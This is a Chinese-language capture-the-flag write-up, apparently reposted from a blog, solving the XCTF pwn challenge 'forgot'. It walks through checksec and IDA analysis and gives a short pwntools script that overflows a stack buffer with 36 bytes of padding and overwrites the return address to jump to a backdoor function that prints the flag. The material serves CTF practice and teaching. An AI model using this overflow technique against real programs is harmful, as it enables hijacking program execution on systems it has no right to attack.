其他分享
首页 > 其他分享> > 攻防世界 Pwn forgot

攻防世界 Pwn forgot

作者:互联网

攻防世界 Pwn forgot

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述
没有canary,可以随便溢出
没有PIE。可以随便使用后门函数

3.IDA

在这里插入图片描述
可以看到有两个溢出点
第一处限制了输入大小,我们就不管了
第二处是一个简单的溢出
只要知道需要覆盖多少byte数据就可以
在这里插入图片描述
接下来找到了cat flag的后门
也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了

4.exp

from pwn import *

io = remote('111.200.241.244',56240)
# io = process("./forgot")
flag_addr = 0x080486CC

io.recv()
io.sendline("kk")

io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()

在这里插入图片描述
得到flag

标签:后门,攻防,flag,io,forgot,Pwn,payload,溢出
来源: https://blog.csdn.net/MrTreebook/article/details/122017668